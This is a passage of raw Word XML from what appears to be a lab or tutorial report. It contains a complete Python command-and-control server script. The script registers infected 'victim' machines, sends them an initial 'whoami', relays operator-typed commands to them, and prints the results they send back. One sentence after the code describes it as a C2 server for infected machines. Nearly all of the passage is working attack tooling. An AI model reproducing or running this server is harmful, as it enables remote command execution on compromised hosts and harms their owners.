      <w:r w:rsidRPr="008B5287">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t># nano Server.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E40F9A0" w14:textId="77777777" w:rsidR="008B5287" w:rsidRPr="008B5287" w:rsidRDefault="008B5287" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblInd w:w="432" w:type="dxa"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8632"/>
      </w:tblGrid>
      <w:tr w:rsidR="00A61341" w14:paraId="0E834E93" w14:textId="77777777" w:rsidTr="00F318FB">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8632" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A2F5C0D"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import </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="FF0000"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>http.server</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="15EB3BDD"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import socketserver</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7C64384A"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import urllib.parse</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2BD07921" w14:textId="4453E60F" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="61ADA603" w14:textId="2B377FD6" w:rsidR="008B5287" w:rsidRPr="00AD6B02" w:rsidRDefault="008B5287" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"># Store a list of connected victim machines  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="77C39F68" w14:textId="76C440C8" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>victims = {}</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61F632E6" w14:textId="6A81F22D" w:rsidR="008B5287" w:rsidRPr="00AD6B02" w:rsidRDefault="008B5287" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t># Default initial command sent to the victim</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="26C7505E" w14:textId="1E8B9F50" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>current_command = "whoami"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7CE83E41" w14:textId="54EFA529" w:rsidR="008B5287" w:rsidRPr="00AD6B02" w:rsidRDefault="008B5287" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"># Store command history for each victim's IP  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4762FC17" w14:textId="02C5BBDA" w:rsidR="00A61341" w:rsidRPr="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">command_history = {}       </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3B6DE54F" w14:textId="77777777" w:rsidR="00A61341" w:rsidRPr="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0202D135"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class C2Handler(http.server.BaseHTTPRequestHandler):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="412098FF" w14:textId="08A009BD" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    def do_POST(self):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EA24417" w14:textId="5C887093" w:rsidR="008B5287" w:rsidRPr="00AD6B02" w:rsidRDefault="008B5287" w:rsidP="008B5287">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">"""Handles incoming POST requests from victims, processes their responses,and sends back new commands."""  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2E313E19" w14:textId="6D6B8D29"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global current_command</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32280838"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content_length = int(self.headers['Content-Length'])</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="44D01C98"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post_data = self.rfile.read(content_length).decode('utf-8')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7EE5BB4C"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parsed_data = urllib.parse.parse_qs(post_data)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4E4F48C5"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received_value = parsed_data.get("data", [""])[0]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52A798A3" w14:textId="77777777" w:rsidR="00A61341" w:rsidRPr="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="029794B6"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client_ip = self.client_address[0]</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0C30C863" w14:textId="33F69DF6" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1716B160" w14:textId="0980D545" w:rsidR="008B5287" w:rsidRPr="00AD6B02" w:rsidRDefault="008B5287" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t># If this is the victim's first connection</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46842F45"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if received_value == "START":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="58164877" w14:textId="72F6C74B"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print(f"[+] </w:t>
            </w:r>
            <w:r w:rsidR="008B5287">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Victim</w:t>
            </w:r>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> {client_ip} </w:t>
            </w:r>
            <w:r w:rsidR="008B5287">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>has connected</w:t>
            </w:r>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>.")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="69E6E90D" w14:textId="00486DA1" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">            victims[client_ip] = "Active"</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="75A263D2" w14:textId="4CE1D1F9" w:rsidR="008B5287" w:rsidRPr="00A61341" w:rsidRDefault="008B5287" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"># Assign the current command to this victim  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7518AE65" w14:textId="2C8F0118" w:rsidR="008B5287" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            command_history[client_ip] = current_comman</w:t>
            </w:r>
            <w:r w:rsidR="008B5287">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>d</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0529BE7A" w14:textId="0BD2E01C" w:rsidR="00905813" w:rsidRPr="00A61341" w:rsidRDefault="00905813" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"># Send the default command  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B4CF9C5"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self.respond(current_command)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7316AF9D"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return</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="485C0AF4" w14:textId="77777777" w:rsidR="00A61341" w:rsidRPr="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="0E1D024B" w14:textId="6E3A7FE4"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print(f"[+]</w:t>
            </w:r>
            <w:r w:rsidR="00905813">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Response from</w:t>
            </w:r>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> {client_ip}: {received_value}")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09EDADF3" w14:textId="77777777" w:rsidR="00A61341" w:rsidRPr="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="35DDF72F" w14:textId="77777777" w:rsidR="00AD6B02" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">        </w:t>
            </w:r>
            <w:r w:rsidR="00AD6B02" w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t># Prompt the operator for a new command or keep the current one</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B54F66E" w14:textId="73062653"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new_command = input("[C2] </w:t>
            </w:r>
            <w:r w:rsidR="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Enter new command</w:t>
            </w:r>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>: ")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="257E91EF"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if new_command.strip().lower() == "stop":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="03B14B9B" w14:textId="4F52E899" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            self.respond("STOP")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AB204EF" w14:textId="022C0221" w:rsidR="00306EE4" w:rsidRDefault="00306EE4" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            </w:t>
            </w:r>
            <w:r w:rsidRPr="00306EE4">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>print(f"[-] Session with {client_ip} terminated.")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6D5A4E3A" w14:textId="122870BB" w:rsidR="00306EE4" w:rsidRPr="00A61341" w:rsidRDefault="00306EE4" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">            exit(0)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="43AE1B40"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else:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="09584AF5"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command_history[client_ip] = new_command</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B405147"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self.respond(new_command)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D7AD415" w14:textId="77777777" w:rsidR="00A61341" w:rsidRPr="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3C26E173"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def respond(self, command):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3AA3DEFB"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self.send_response(200)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3BAE13BB"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self.send_header('Content-type', 'text/plain')</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2037D0E4"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self.end_headers()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="18557A25"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self.wfile.write(command.encode())</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="223BA394" w14:textId="77777777" w:rsidR="00A61341" w:rsidRPr="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="64FF18D7" w14:textId="4DF94626" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>def start_server(port=8080):</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6F04ED5A" w14:textId="075674FD" w:rsidR="00AD6B02" w:rsidRDefault="00AD6B02" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">"""Initializes and starts the C2 server, listening for incoming victim connections."""  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1AD2B45A" w14:textId="1EC00EE9" w:rsidR="00AD6B02" w:rsidRPr="00AD6B02" w:rsidRDefault="00AD6B02" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    </w:t>
            </w:r>
            <w:r w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:color w:val="00B050"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"># Create a TCP server on the specified port  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2968D32A"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with socketserver.TCPServer(("", port), C2Handler) as server:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3579AAAE" w14:textId="10D66C1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print(f"[+] </w:t>
            </w:r>
            <w:r w:rsidR="00AD6B02" w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>C2 Server is running on port</w:t>
            </w:r>
            <w:r w:rsidR="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>{port}...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1795A670" w14:textId="6D5440B4"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print("[+]</w:t>
            </w:r>
            <w:r w:rsidR="00AD6B02" w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Waiting for victims to connect</w:t>
            </w:r>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>...")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="631EC644"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try:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2EA905A8"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server.serve_forever()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="254AC78A"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except KeyboardInterrupt:</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="40D5B3E0" w14:textId="579DB2CE"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print("\n[-]</w:t>
            </w:r>
            <w:r w:rsidR="00AD6B02" w:rsidRPr="00AD6B02">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Stopping C2 Server</w:t>
            </w:r>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>")</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="616281CC"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 xml:space="preserve">            server.server_close()</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1B1A5EC1" w14:textId="77777777" w:rsidR="00A61341" w:rsidRPr="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="5DB1DE50" w14:textId="77777777" w:rsidR="00A61341" w:rsidRPr="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>if __name__ == "__main__":</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4DF015DB" w14:textId="0BAA98DA" w:rsidR="00A61341" w:rsidRDefault="00A61341" w:rsidP="00A61341">
            <w:r w:rsidRPr="00A61341">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">    start_server(8080)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="14CDDF98" w14:textId="4D30434E" w:rsidR="00A61341" w:rsidRDefault="00AD6B02" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00F318FB">
        <w:t xml:space="preserve">The Python script acts as a </w:t>
      </w:r>
      <w:r w:rsidR="00F318FB">
        <w:rPr>
          <w:rStyle w:val="Strong"/>
        </w:rPr>
        <w:t>C2 server</w:t>
      </w:r>
      <w:r w:rsidR="00F318FB">
        <w:t xml:space="preserve"> that listens for infected machines (victims), sends commands, and collects results.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F92E0A6" w14:textId="50C12DED" w:rsidR="00AD6B02" w:rsidRDefault="00AD6B02" w:rsidP="00A61341">
      <w:pPr>
        <w:pStyle w:val="Pharagraph"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E0BACF9" w14:textId="37344C30" w:rsidR="00AD6B02" w:rsidRDefault="00AD6B02" w:rsidP="00A61341">
